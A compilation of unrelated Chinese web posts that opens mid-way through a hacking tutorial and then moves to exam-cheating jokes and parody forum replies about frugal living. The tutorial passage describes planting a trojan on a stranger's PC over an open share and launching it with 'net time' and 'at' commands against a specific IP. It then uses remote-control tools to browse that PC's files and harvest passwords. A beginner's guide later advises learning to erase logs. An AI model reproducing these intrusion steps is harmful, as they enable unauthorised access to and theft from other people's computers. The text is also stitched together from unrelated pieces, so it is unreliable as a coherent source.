这是在远程复制文件，其中的1.exe是我们配置的木马客户端，如果你怕被他的杀毒软件查出来的话，用最快的速度把他的监控关掉，这是要技术的哦！如图12，我们已经把文件复制到他的电脑上。接下来然后怎么运行呢？不能用鼠标去点吧？没错，用计划任务，这样可以让它自己运行。首先是确定他的时间，输入命令： C:\>net time \\220.201.68.239
如图13，我们得到他的系统时间，我们要做的就是把软件的运行时间稍微往后延点。接着输入计划任务的命令：
C:\>at \\220.201.68.239 12:42 1.exe
图14显示"新增加了一项作业，其作业" ID = 5"表示计划任务设置成功。时间到了，软件自然就会运行了。
运行"黑暗天使"的客户端，输入IP（如图15），就可以连接了。连接后能做什么呢？图16就是这位老兄的电脑，一共5个分区。你能做的除了上传下载文件外，还可以重启电脑、删除文件，甚至可以用配置好的服务器端搜集他的密码发到你的邮箱里，恐怖吧？

相比之下，有位论坛上的老兄告诉了我另一个非常好的软件，跟"黑暗天使"相比，有过之而无不及，那就是"DameWare NT Utilities"（如图17）。输入存在问题的电脑IP，然后点击"OK"。图18就是对方的电脑，每一个分区都很清楚。看看左边的目录吧，吓死你，什么功能都有，无论是计划任务也好、用户组也好，统统都归你控制了，想怎么样随你。
唉，到了这个地步，我实在不好意思再继续偷窥下去了，突然间感觉网络很危险。算了，兄弟我也是一时的气愤，毕竟没有动他们的东西。唉，还是收拾收拾，把我复制的文件统统删掉，闪吧！

为了防止你也沦落到像上面那位仁兄一样的下场，这里给你一个去掉Windows 2000中c$（c代表你的任意分区）共享的方法，取消了"c$"意味着你已经取消了Windows 2000的远程协助和管理。你可以使用如下两种办法来取消Windows2000提供的默认共享逻辑驱动器服务（drive letter$）,并使其在开机后不会自动产生。
使用系统策略编辑器：
1.按"开始"→"运行"，输入"Poledit"，点击"OK"键；
2.在"文件"菜单中选择"打开注册表"；
3.双击"本地计算机"；
4.扩展"Windows NT 网络"→"共享（服务器）"；
5.清除"创建隐藏驱动器共享（服务器）"选项框，点击"OK"键；
6.在"文件"菜单中选择"保存"；
7.重新启动计算机。
注意：若要在运行Windows 2000 Professional的计算机上安装Windows 2000 管理工具（包含 Poledit.exe），请访问Windows 2000 Server光盘上的i386目录，双击Adminpak.msi。
使用注册表编辑器：
1.运行注册表编辑器（Regedt32.exe）；
2.在注册表中找到如下键：
HKEY_LOCAL_MACHINE\SYSTEM\Curren
tControlSet\Services\LanmanServer\Parameters；
3.将其下 AutoShareServer 的值改为0；
4.如果在该键下没有AutoShareServer，需要新建一个REG_DWORD,名称为AutoShareServer，值为0；
5.退出注册表编辑器；
6.重新启动计算机。
注意：修改注册表可能会对系统造成不可预知的影响,建议您在修改之前备份注册表.

隔离现实：严格分清作为网络ID和现实中人的区别。不利用网络手段解决个人恩怨。

　　拒绝重复：不断寻找更新的发现，不重复的利用某个漏洞去尝试入侵

在网上我曾看见一段来自于江海客文章的内容，有关黑客的三个倾向，颇为中肯。"关于黑客有三个不好的倾向：神话、丑化和美化，有了过分神话出来的力量，过度丑化激发的恐慌和逆反心理，加上不恰当叫好的鼓励，一方面是越来越多的人把成为一名黑客当作理想，另一方面则是有些黑客放弃冰山下面的生活，渴望来到前台戴上红帽子。"这非常深刻的描述了目前中国黑客的状况。 　　很多的人开始玩弄着一些过时的或现成的黑客工具，用于攻击更普通的上网者，或是满足技术领先的快乐，或是满足破坏的欲望，恐怕这样的人数最多。但我们探讨的目的，只是为了更多的了解网络知识，了解真正的黑客。如果黑客的行为算是偷窃的话，他们要什么呢？他们要更多的网络和电脑知识，以及所有电脑技术漏洞的挑战。 　　从网络来看，当信息穿越Internet从一台计算机流向另一台计算机时，通常要经过很多中继结点，即主机或交换机。在整个传输过程中，信息的发送者和接收者只能对发送和接收端加以控制，而中间穿越Internet的过程则无法加以有效控制。如果穿越路由中存在假冒结点，信息很容易被截获和篡改，线路窃听所造成的信息泄露更是难以避免。因此，信息最终到达接收端后，其完整性和保密性当然也就无法保证。 另一方面，Internet自身的运行在一种开放型的协议机制下。网络结点之间的通信是按照固定的机制，通过交换协议数据单元来完成的，以保证信息流按"包"或"帧"的形式无差错地传输。那么，只要所传的信息格式符合协议所规定的协议数据单元格式，那么，这些信息"包"或"帧"就可在网上自由通行。至于这些协议数据单元是否来自源发方，其内容是否真实可靠，显然无法保证。网络中只考虑信息的无差错传输所带来的固有的安全漏洞是不可避免的，更何况某些协议本身在具体的实现过程中本身就含有缺陷。黑客利用的就是这些。 　　黑客喜欢运用自己的智慧挑战着别人的私心和别人的私藏（这里暂不谈黑客自己的私心），并通过发放自己的黑客技术鼓励着更多的人成为反共享者的挑战者。仅从这个意义上说，黑客是互联网精神的化身。他们希望通过自己的努力维持网络的技术平衡，而使网络不至于成为新的垄断市场。黑客都是真正的电脑技术专家，而不是玩黑客软件的爱好者。看看黑客的部分原则： 　　隔离现实：严格分清作为网络ID和现实中人的区别。不利用网络手段解决个人恩怨。 　　拒绝重复：不断寻找更新的发现，不重复的利用某个漏洞去尝试入侵。 　　善意提醒：从不破坏，如果需要修改系统，要为用户留下备份。 不以入侵行为牟利：黑客行为与商业利益无关，不参与商业竞争。 　　当然，我们不否认黑客中也有破坏者的存在，并且利用技术进行破坏，盗窃等等活动，但可以相信的是，大多数黑客都是真正的电脑技术爱好者，学习和研究才是他们真正的目的。请努力学习吧，没有足够的技术做为力量，而只是玩些工具来满足自己的虚荣的话，对人对己都没有什么好处，做个黑客你准备好了吗？

作者：kkxiaoxiao
--------------------------------------------------------------------------------------------------

写在前面的话
 在网上看过了很多别人写的一些关于hack的学习~和一系列的各种的技术文章~不免也有了一些自己的想法~所以呢今天发表出来~希望对于那些还没找到什么学习的门路和技术基础的网络爱好者们~能够有一些启发和帮助~！

 能够接触到hack我想大家都通过不同方式~就我而言我是在看过一本蛮厚的hack书籍后~对次产生了兴趣！~当然初读那本书时~更本什么都看不懂~我想这一点也是大多数初学者的感觉吧~然后呢~自己就去书店找一些关于电脑方面的书来看~当然~还都是一知半解的~后来家里的电脑能上网了~（其实如果要真的想学习这门技术的话就必须有一台属于自己的能够上网的电脑）才发现原来网上才有我想要的任何的东西~个大hack网站和安全网站~有很多的各种各样的~教程啊~什么的~我就一天到晚的去那些网站把它们上面的文章copy下来慢慢的看~但还是发现什么都看不懂~但没办法~没有人告诉我怎么入门吗~只好不停的找文章看啊~偶尔能够找的一些基础的东西~提升一点自己的等级~直到有一天突然发现原来网上的文章~对我来说就有两种~！要么就是我懂的~都是些非常简单的东西~要不然就是一些~我根本一点都搞不懂的东西~所以呢~觉得自己应该去看一些比较正规的教材书了~所以去买了一些~类似黑客教材的书~来系统的看~但看过一段时间后~有发现~这些东西对我来说都是很easy的东西了~除非那些专业的知识我还没有学过~所以不懂~于是我就又去买了诸如tcp/ip，C编程，RED HAT LINUX大全,计算机网络基础~之类的专门的技术教程~然后一门一门的搞懂~对于这些基础的东西知道了后~在看网上的那些~利用漏洞的攻击教程才发现~能够明白那些~代码呀~专业术语啊~什么的~这才算又升了一级~！既然能看懂了别人写的一些攻击过程~自然自己忍不住也想试一试咯~但是那些发表出来的攻击过程~都是一些很早的文章或者都是一些过时的漏洞了~有这样的主机已经不多了~我扫了很久都扫不到~就算扫到了~按照文章上说的去做~也还是成功不了~总之就是~失败~！不知为什么~我就这样不停的看文章~然后~去扫主机~照着去做~最后失败~就这样我耗了很久~当然在此期间我知道了有IRC这样有趣的地方~也有不停的从网上的文章学到些东西~但都经验值太少了~不能升级~！于是我~开始在网上看FLASH，泡IRC，玩游戏~浪费了不少时间~再加上现在高中的功课~停滞了一段时间~直到有一天发现了~《黑客防线》这本杂志~突然发现上面的东西~有一些基础的知识~也有最新漏洞的攻击过程~顿时心血来潮~买了来~试了一试上面写的攻击过程~呵呵~终于成功了~当然我不是那种没上进心的人~不会沉迷于~某个洞洞里~出不来了~于是有开始学习~但还是发现~有一些~东西看不懂~于是又去书店买一些专门的教程~学习ASP，PHP.CGI.等一些知识~但由于现在高中的课程太多了~只好先以学习为主~暂停hack的学习~毕竟我还想考个好的大学~以后有个好的发展呢~不过学习hack技术仍然是我最好的休息方式~虽然自己没什么技术~但还是把我的学习过程总结一下~希望对那些~很想学习~hack~但还不知道从什么地方开始学习的朋友们~有所帮助启发~。
当你发现hack的时候~去书店和网上的些专门网站找一些最简单的你能基本看懂的攻击过程文章看~（这算是培养学习hack的兴趣）
当你发现你觉的有些很简单,又有些根本看不懂的时候~去书店买一些书籍~学习~tcp/ip.计算机网络基础.各种操作系统.还有各种编程语言.数据库这都是必须要学的，当然最好尽可能多的学习你听说过的知识~！！！
然后有了一定的基础~对于那些攻击文章~能过看懂~了不妨买本好一点的hack杂志~来学习~
-------------------------------------------------------------------------------------------------------------补充:
在学习的过程当中~你可能会有些迷茫~其实hack里有很多技术是分类的~破解~crack是一类~编程~是一类~那hack搜索漏洞进行入侵就又是一类咯~所以呢~要选一个自己喜欢的方向发展~.
再就是学习编程的时候~其实不一定要学很多编程语言~其实只要精通一门~其他学起来是会很轻松的~此乃所谓一通百通么~多去看看这方面的资料吧~
还有在学习的时候~要记住在hacker的世界里是不会有人帮住你的~一切都要靠自己~不过认识更多的hacker是很有必要~毕竟hacker是个群体概念吗~其实类似www.baidu.com 或者www.google.com的搜索网站是你最好的老师了拉~
最后~是最重要的~不要~看到了别人的入侵过程就急着去试~要知道在你还没了解这方面的技术前~你不知道自己会给别人造成多大的破坏~万一~一不小心~就....~这可不是开玩笑的~要坐牢的~起码的你学会了删除日志啊~或者能够隐藏自己后~在说吧~
好了~就这么多了~

一次去上自习 ，到教室里面看见熟人，就坐那里和人家说话，人家一边做题一边和我聊天。后来发现气氛不对，一问，才知道人家在考试，我问老师呢？她说老师在最后一排偶出来看表，20分
一次去上自习 ，到教室里面看见熟人，就坐那里和人家说话，人家一边做题一边和我聊天。后来发现气氛不对，一问，才知道人家在考试，我问老师呢？她说老师在最后一排偶出来看表，20分钟......

　　偶考大学物理的时候，交卷是自己上去交的，临时看了一个兄弟的填空题，就在黑板那里改答案，老师过来问，我说名字写错了，考试结果下来一看61......

　　高中时一次政治考试，最后一排一男生将课本摊在大腿上奋笔疾书，不料监考如乱马般悄无声息绕到其后，轻抚其肩。该生惊觉，面不改色曰∶对不起，桌肚里东西太多，放不下，只好让它待在腿上。随即低头继续疾书。全班倒。

　　高中同学抄书发现题目有歧义，就拿课本和老师理论老师过了3分钟才反应过来，叹息不已。

　　初中时隔壁的女同学在一次生物科考试中把书扔在地上，用脚趾翻书抄，偶一直很pf她的眼力和脚趾的灵活性。

　　我们大三的时候有一科选修——宏观经济调控，偶基本上没去上过。后来考试的时候全班哭求老师开卷考试（最后一堂课倒是人挺全的），老师人心好，答应了。第二天考试，大家才发现书早就没了（借给了别的系，他们是必修），后来全班也才凑了十几本，考试的时候四个人用一本狂抄，还不停的叽叽喳喳。监考的老师和他老婆（也是我们系的老师）是在看不下去了，两个人站在讲台上气得直发笑，说我们：你们不会吧，就给你们书让你们抄，给你们书吧，你们连抄哪儿都不知道......"另外说一句，这个老师只有一条胳膊，胆识是我们系乃至全学院最有学问，讲课讲得最好的老师，板书极漂亮。我们都称他为——杨大侠（暗指杨过）。他老婆人也很好，我们称她小龙女，但长得确实......

　　女生把字写在大腿上，被监考得男老师看见了，叫她站起来，就是不敢叫她把裙子翻起来，结果那个女生考了第一。

　　以前考外教的，可以带字典进去。狂多人带电子字典或者PDA之类的，内容都先输进去了。最夸张的是有一门的东西非常多，有几个女生就一人录入一部分，然后考试的时候，无线传输......

　　我有个同学大学考英语，他买了一盒绣花针，然后把老师所说的考试内容刻提前刻在了书桌上（我们的书桌是那种发亮的硬板），正正的看是看不到的，只能斜着看才能看到，他刻了一下午，刻钝了N 个针，最后手都麻木了，然后扔了一本书在桌子上占座。我想那张课桌会成为以后师弟、师妹们抢占的一张。

　　我最赚的一次是什么也没有准备，一心以为要死定了！已经准备好重修费了！！来到考场坐着发呆！结果监考老师要求大家换位子，我到新的位子坐下一看！！哇哈哈哈哈哈哈哈哈！！所有的答案都抄在桌子上，而且抄的很全！！四处张望一下，发现一位兄弟正双眼喷火的盯着我！！哈哈哈哈，结果这门课就顺利通过！！

　　有一次做梦梦见我在考试，吓的我心惊肉跳，醒过来发现自己果然在考试！

　　上次考试，前面的老兄便拿出纸团抓阄。他抓了又抓老师过来问他干什么，他反问："难道不要验算吗？"

　　某达人考试时一直睡觉然后快下考时醒了左右看了看，发现后面同学的卷子做完了还没写名字顺手拿过来写上自己名字交了......

　　以前，偶mm是英语专业，偶8是。有一次偶系考大英，竟然临时叫来mm监考！偶看到她近来，差点昏倒~~~~全体哥们怒视偶，（偶考完被狂扁）偶的e文那是一塌糊涂，mm巡考，瞄到偶的试卷，差点气昏。与mm同来监考的是一40多岁中年男子，偶8认得，mm借故跟他聊天，挡住他视线，偶们狂抄啊！mm还对他巧笑倩兮，靠，便宜哪个大叔了！（mm是外语系的系花）无奈lg太丢份，不会的还是不会。mm过来看试卷，狠狠瞪偶一眼，悄悄指偶 答题卡：猪头，都选错了！！！5分钟后，偶短信息，mm发的，全是答案！幸福ing......结果，由于一人得福，全班男生均及格！偶们e文老师狂夸偶班啊！从此，偶mm成为偶系的神~~~~

　　一次考金工实习（补考），考试中偶们狂抄，交卷时监考老师给偶们检查考卷，指出偶们的错误，当场修改，结果偶们最低85分，可是考试前每人交给监考老师30元（美其名曰：补考费）。

　　两同学，挺像！物理考试进行到65分钟，一人交卷，然后，一人上wc交卷的人继续进来考试！

　　考珠算。一哥们拿了个计算器，结果被没收了。老师照顾他，下一堂继续考。这B回宿舍找了个巨大的又进去。结果，据说在考到一半的时候这B 大吼一声——"妈个B，坏的！"

　　偶高中一同学E文考试作文抄课本。最后E文老师把他的作文拿出来念。其中有"恩格斯称赞我学习努力"......（当时课本第一课文章内容正是讲马克思与恩格斯的故事）

　　大二时，考试跟体育系的人隔排坐。我们同学尽皆大方，只要不影响我们，随便他们抄我们的试卷。有一强人从头到尾狂抄我们一个同学的试卷。考完交卷了，他很神秘的问我们同学，为什么那道大题要先写很多字，然后画个大框和大叉，然后再写一段啊~~~是不是有什么格式规定？~~~~全体昏倒，是我们同学答了半天发现错了，划掉再写，他老人家竟然一丝不苟的全抄了......

　　我大学的时候，一次考试，一个女生被抓了现行，被监考老师没收了准考证，并勒令她收拾东西离开考场 那女生趴在桌子上，慢慢的肩膀开始一耸一耸，监考老师是个老头，一看这情况走过去安慰道："没事，又不是全部科目不让你考了，回去吧，啊"那女生居然渐渐哭出声来了，老头一看这情况说："别哭了别哭了，好吧，我把准考证还给你，不算你作弊好了吧" 那女生也不理她，大哭起来，一把鼻涕一把泪的，老头害怕了，凑过去说："要不....咱再抄点儿......？！"全班狂FT！！

　　大二的时候，考英语，是分AB卷的，全是选择题。一兄弟在最后10分钟终于拿到答案，突然发现答案是A卷的，而自己的卷子是B卷。再拿答案以来不及。低头想了1分钟，开始抄。抄完了后，将答题纸角上那个"B"一把撕了，写了个"A"，就交了。分数出来，60分......全班对他五体投地。

　　说个偶哥们的事儿吧，有次选修课考试，这哥们睡过头了，没去参加，只好无奈的等补考啦，结果成绩一公布，这哥们居然pass了。不是没抓人，抓了N个，但是没抓到他。全体兄弟汗~~~后来我们分析，那老师一定是把不及格的试卷挑出来，对着分数表挨个添上不及格，剩下的就全Pass......唯独没想到还有没来考试的......

　　一次监考，带着一罐冰红茶提前进考场，喝了一半去窗边听电话。考生进场后，一mm欢呼着奔向讲台，拿起冰红茶说："有冰红茶喝！！！"偶暴寒，整场考试都盯着该mm看。

　　我一哥们感冒，考试的时候拿一空白作业本擤鼻涕。考到一半年级主任视察，看见那哥们桌子上有几张叠起来的纸，过去就拆开检查。看见的都开始窃笑。没想到主任发现一张不是后，很有耐心地把所有纸条都打开看了一遍，全场抓狂。

　　我宿舍老大老六，brood了一个学期，考前背了4天，都觉得很可能挂，决定放手一博，考场上答完题写上对方的名字交了。考完了还直说，给别人考试真没压力。

　　在好多大学年轻老师多，一般监考都很没意思，于是就看女生。漂亮女生学习又不好，于是后果可想而知，有次监考一个女生很漂亮，特妖艳那种，很出名，全楼的年轻老师都借故来看了一圈，可怜那女孩衣兜里的小条，一个没拿出来，只好补考，又被老师们参观一回。

　　考研，计算机专业课。开考10分钟后，偶正低头做卷子。突然计算机系主任脸色铁青冲了进来，搜走了所有人的卷子，然后宣布考试作废，第二天下午再考。纳闷中别人告诉偶：试题的背面印着标准答案。当晚校领导就上了新闻联播。第二天，再考。拿到卷子一看，还是昨天的题 ！当即FAINT~~

　　再一个，一哥们考模糊控制，考试时间两个小时。任课老师监考，边监考边摇头："都是上课教了的呀，又不难，居然都做错了。书带了没？好好看看书！"快到点了，宣布：延长半个小时。又逛了十来分钟：你们怎么学的呀，看着书都做错。象那样做是8对的！应该这样........转身上讲台开始板书讲解，写了一黑板，然后拍拍手：再延长半小时那个汗啊~~~~

　　偶单位信息化考试，说是闭卷不准带书，偶是新来超恐怖，可是老同志一个个当没事，到考场，拿到卷子，旁边同事告诉我看黑板，嘿，答案全在上面，一会监考进来，连声道歉：不好意思，问答题第二个答案不对，麻烦写过的同志把题改成和答案相对的......寒

　　大三信息统计最后一节课，老师问我们愿意开卷考试还是闭卷，商量后大家选开卷，觉得好歹能抄点，回去后得知兄弟班选的闭卷，考试时间安排下来，他们还先考，考完后我们赶紧去打听题目，他们还说：不用啦，巨难，你们敢选开卷，肯定死透了，到时候拿书都抄不着......等一开考，倒......一样的卷子。成绩下来，兄弟班被抓了一大堆，怒，去找老头理论，老头说：你们自己选的闭卷，我又没说卷子不一样。

　　这个是俺听来的。据俺们老师讲隔壁兄弟学校监考老师抓一个作弊的可以奖励50元，结果一次抓住一女生小抄（一张纸条），正当老师拿着战果准备领奖，该女生扑上前去，一把夺回纸条并一口吞了下去，老师愕然，半晌才说了一句："你比解放前地下党还厉害！"

　　我上大二的时候，一次考电机原理， 全班都在狂抄， 监考的一老头老教授，把班上的一杨姓女生的书和小抄都没收了。此女生乃恩施的一少数民族，性格彪捍，脾气古怪。她一下站了起来，大哭："大家都在抄，你为什么要收我的。我男朋友不要我，你考试也不让我过，你们男人都不是好东西......我不想活拉......@#$$%@$$@#2"大家愕然......结果，来了四个老师才把她哄住......让她继续考试。结果此门考试，大家全部PASS。那位小杨同学，毕业前精神崩溃休学治病。

作者：星坤

到有朋友在这里介绍自己怎么生活的，觉得蛮有意思的。其实每个月花多少，与收入没有太大的关系，我身边好多人每个月也有三四千，但整天还到处借钱的也不少。


到有朋友在这里介绍自己怎么生活的，觉得蛮有意思的。其实每个月花多少，与收入没有太大的关系，我身边好多人每个月也有三四千，但整天还到处借钱的也不少。

我一个月收入15000(当然，真正到手的只有12000多，因为还要交税和四金)。我的工资都直接打到卡上，而我一般不带这个卡的，只是随身带几百块现金和一张招行金卡。但我每个月的花费算下来也就300左右，可能还不到(因为我没有具体记录过)。开销的明细大致如下：

房子：住自己买的，所以不需要花钱；

手机费：50左右(用的是cdma的套餐，月租免了，平时都在办公室或家里，一般用座机)；

交通费：为了增加运动量，每天上下班骑自行车；

伙食费：原来在公司楼下的餐厅吃，后来觉得又贵又不好吃，就从家里带饭，算下来大概4块钱的成本；早上二个小刀切馒头，一杯牛奶，成本大约1.2块钱；晚上一般只喝点稀饭，吃些青菜，最多1.5块钱。一个月下来大约：6.7*30=201块，

零花钱：因为没有烟酒爱好，所以平时没什么需要花的。只是同学多，会经常聚一下，出去吃饭或喝茶、咖啡，轮到我出钱的时候也有一些，估计一年下来1500应该够了，平均到每个月大概120多。

其他：我喜欢户外运动，但不买健身卡，去公园广场打打球，或在家里练练哑铃，这项不需要花钱。现在书也很少买，网络这么发达了，需要什么资料都在网上查。我在家从不上网，因为白天在办公室一直上网(包括网络办公)，又省了一笔。

总共加起来不到400块，这种生活也很充实丰富。所以花钱多少与生活的好坏没有直接关系，与收入更没关系。

*************************ARTICLE 2************************

钢管舞男的绝妙回帖：
另外一个老大马上就这么说了

楼主也忒不地道了吧？
穷弟兄们说说持家节俭也就罢了，你老这么高薪水也好意思来这里这么说？忍不住要骂你几声！！

你丫从来不买衣服，因为你裸体上班上街，全马路的人都看不见！
你丫从来不交物业管理费用，因为你们那的物业是你们家开的！
你丫在家里打电话但是从来不交费，因为别人把线路错搭到你家电话线上了！
你丫从来不给父母钱，因为他们可能早过世或者和你脱离了关系！
你丫从来不发生抚养费用，因为你没老婆或者孩子只用喝水就活得跟人似的！
你丫从来不修理自行车，因为你的车坏了自行车厂就会给你送新的来！
你丫买cdma不花钱也不产生话费，因为移动和联通话机和话费没必要收了库房里放不下，只好把电话免费送给你放包里当纪念品！
你丫一年不吃肉，因为你丫身体是特制的，缺什么营养都可以通过呼吸自动补充！
实在说不下去了，因为我发现你真强！！！！！

*************************ARTICLE 3************************

马上还有更厉害的

看到有朋友在这里介绍自己怎么生活的，觉得蛮有意思的。其实每个月花多少，与收入没有太大的关系，我身边好多人每个月也有三四千，但整天还到处借钱的也不少。

我一个月收入150000(当然，真正到手的只有120000多，因为还要交税和四金)。我的工资都直接打到卡上，而我一般不带这个卡的，只是随身带几块现金和一张明骗。但我每个月的花费算下来也就30左右，可能还不到(因为我没有具体记录过)。
开销的明细大致如下：

房子：自己捡砖头盖的，所以不需要花钱；

水电煤气：水是打的进，电不用，煤气也不用。

手机费：0，(周围朋友都有，我要用就用他们的吧，平时都在办公室，一般用座机，家里就用隔壁的)；

交通费：为了增加运动量，每天上下班走路；

伙食费：原来在公司楼下的餐厅吃，后来觉得又贵又不好吃，就吃女同事吃剩下的，因为她们饭量小；早上不吃；晚上一般只喝点稀饭，吃些青菜，最多0.8块钱。一个月下来大约：0.8*30=24块，

零花钱：因为没有烟酒爱好，所以平时没什么需要花的。只是同学多，会经 常聚一下，出去吃饭或喝茶、咖啡，轮到我出钱的时候就溜。

其他：我喜欢户外运动，但不买健身卡，去天桥露露营之类的，或在家里练练哑铃，这项不需要花钱。现在书也很少买，一般是偷书，网络这么发达了，需要什么资料都在网上查。我在家从不上网，因为白天在办公室一直上网(包括网络办公)，又省了一笔。总共加起来不到30块，这种生活也很充实丰富。所以花钱多少与生活的好坏没有直接关系，与收入更没关系。

*************************ARTICLE 4************************

一个愤怒的兄弟说：

靠！
照你这么算，市政府都他妈是sb啊？
上海最低生活保障线都顶580呢！
你丫的一个月300还活的油光水滑的，那低保的估计一个月发10块钱足够了。

一个冒充政府ld的兄弟说的
我一个月收入2500(当然，真正到手的只有2000多，因为还要交税和四金)。我的工资都直接打到卡上，而我一般不带这个卡的，只是随身带几十块现金。但我每个月的费算下来也就100左右，可能会超过些(因为我没有具体记录过)。开销的明细大致如下：

房子：住政府的，所以不需要花钱，房租有房屋补助，还用不完；

手机费：0，政府不让用，但是隔三岔五有人送还连带号码（我家里人都用这些手机，连我9岁的儿子和乡下来的保姆），在办公室或家里，一般用座机；另外还有秘书会帮联系，不要钱；

交通费：为了增加群众基础，每天上下班骑自行车（大约200米）；办事有配车连司机（不要钱，连油钱都报了），但是我喜欢自己开，有些地方别人去不方便；

伙食费：原来在政府的食堂吃，不好吃也得吃，吃完了再去外面补，每个月的饭票是秘书帮买的，但他没问我要过钱，应该很便宜。

零花钱：虽然烟酒都爱好，但是也没什么需要花的，都是别人来看我是送的。还抽不完喝不了，老婆拿到她们亲戚的小卖部卖了，换点日用品回来，这些没人送。只是应酬多，出去吃饭或喝茶、咖啡、乱摸、*歌，轮到我出钱的时候也有一些，不过总是有些企业老板顺带帮我买了单。不过小费不好叫别人给，虽然小姐都很 乐意的不要，但是偶尔遇到要的，我还是给的，完了叫派出所抓她丫的。

其他：我喜欢户外运动，以前玩保龄，现在玩高尔夫了。vip卡是球场送的，这项不需要花钱。现在书也很少买，我就不看书，因为书就是输啊，谁会想输?

总共加起来不到200块，这种生活也很充实丰富。所以花钱多少与生活的好坏没有直接关系，与收入更没关系。

*************************ARTICLE 6************************

热心公益事业的说：

大家都没想到一点，为什么不劝楼主把省下来的每月万把块钱捐给社会呢？除了自己用300元，全部给慈善事业，毕竟中国还有那么多饭都吃不饱的人，那样才能不辜负楼主一片苦心，因为楼主那么省吃俭用，就是为了无私地报答社会报答芸芸众生呀。何必给孩子留遗产，全部给社会不更好吗？

还有，象楼主那样无私奉献的精英，退休后因为不干活，白吃社会的俸禄就太不 合算了，干脆去翘辫子算了，可以为社会省下一大笔开支，包括楼主活下去所呼吸的氧气，所喝的水、所排泄的粪便，都是对社会资源成本的极大浪费。别忘了，临翘前留下遗嘱，全部遗产捐给穷人，而且，要写在旧报纸上，那样节约资源。

*************************ARTICLE 7************************

崇拜楼主的人说：5555

偶像！你才是我的偶像！周星驰算什么？你比他幽默！周润发算什么？你比他有气质！周杰伦算什么？你比他有才华！周伯通算什么？你比他功力深！周迅算什么？你比她机灵！周芷若算什么？你比她美丽！周华健算什么？你比他会唱歌！周树人算什么？你才是文学泰斗！周武王算什么？你比他更爱招贤纳士！周公算什么？你比他会 解梦！周扒皮算什么？你学鸡叫比他好听！周渔算什么？你比她长得像火车！周瑜算什么？你比他会生气！周周算什么？你比他有音乐细胞！

我要把你这篇帖子牢牢的记在心里，刻在脑海里；我要去学活字印刷，把这篇帖子印成铅字；我要去学雕刻，把这篇帖子雕成雕像；我要去学作诗，把这篇帖子改为不朽的诗篇；我要去学作词，把这篇帖子改为歌词；我要去学歌唱，把这篇帖广为流唱；我要去学说梦话，在梦里也要深情的朗诵；我要去学刺青，把这篇帖子刺在每个人的身上！我要做黑客，把所有的网站都改成这篇帖子；我要做法官，让所有 的囚犯都抄写这篇帖子；我要做中国移动的董事长，给所有手机用户群发这篇帖子；我要做微软总裁，把所有的电脑操作系统都改为这篇帖子；我要做上帝，让亿万万信徒从此以后只靠这篇贴子来作为圣经，来指引他们的光明！

楼主，我现在有些冷静下来了，我觉得应该做一些实际的事情。我决定先把 你的名字纪录下来。让子孙后代牢记于心，广为传诵。让他们知道什么是中国的传统美德，什么是炎黄子孙的精神，什么是黄河水，什么是长江魂。什么是五千年的文明史

楼主！我一辈子都没有像今天这么开心，这么幸福，这么快乐，我想我已经找到了人生的真谛，那就是每天都能看这篇贴子，每天都将这篇贴子读活才充满了朝气。可是这样我只是得到肉体上的满足。我卑微的灵魂并没有在烈火中得到永生。我想对你说，能够让我永远活的像个人，像个真正的人。就只有楼主――您了！

也许这么做是犯天下之大忌，也许这句话才说一半，我就被同样祟敬您的这些追随者用牙齿撕成碎片，可是我不怕。是您给了我无限的勇气，是您在指引着我正确的方向，我抬起头，天空中您的身影渐渐浮现，您仿佛在朝我微说："just do it ！"这声音忽远又忽近，我知道，它来自我心。

*************************ARTICLE 8************************

一个最nb的说的：

我一个月收入150000(当然，真正到手的只有120000多，因为还要交税和四金)。我的 工资都直接打到卡上，而我一般不带这个卡的，只是随身带几块现金和一张明骗。但我每个月的花费算下来也就-312.2右，可能还要多(因为我没有具体记录过)。

开销的明细大致如下：

房子：-299，住在别人的屋檐下面，顺便给人家看门，每月得299元；

水电煤气：水是从单位用桶带一部分，下雨的时候接一部分储存起来，

电自己用太阳能发的，没有太阳的时候接闪电，煤气也不用，我一般拣点柴火在楼里烧火，有时候别人家的烟囱里冒出来点我也能将就一顿。

手机费：-30，(周围朋友都有，我要用就用他们的吧，平时都在办 公室，一般用座机，家里就用隔壁的)；另外通过去移动公司声称要爆光能得约30元封口费。

交通费：为了增加运动量，每天上下班走路，猫着腰低着头偶尔也能捡到块儿八毛的；

伙食费：原来在公司楼下的餐厅吃，后来觉得又贵又不好吃，就吃女同事吃剩下的，因为她们饭量小；早上不吃；晚上一般只喝点稀饭，吃些青菜，最多0.8块钱。一个月下来（只算工作日）大约：08*21=16.8块，非工作日我躺在床上 食（也叫辟谷）。

零花钱：有烟酒爱好，但平时没什么需要花的，手中拿烟巴向别人 借火，遇到行动敏捷的就偷抽人家一口，遇到动作慢的我直接拿着烟走人，我自己管这叫抽霸王烟。至于酒，可以趁别人请客时倒衣服上点回家洗出来喝，偶尔也到医院捡酒精棉球回来改善一下。只是同学多，会经常聚一下，出去吃饭或喝茶、咖啡，轮到我出钱的时候就溜，溜不了就压身份证，再花10块补一张。

其他：我喜欢户外运动，但不买健身卡，去天桥露露营之类的，或在家里练练俯卧撑，这项不需要花钱。现在书也很少买，一般是偷书，网络这么发达了，需要什么资料都在网上查。我在家从不上网，因为白天在办公室一直上网(括网络办公)，又省了一笔。

总共加起来花费-312.2块（根据捡到钱的多少绝对值还有所增加），这种生活也很充实丰富。所以花钱多少与生活的好坏没有直接关系，与收入更没关系。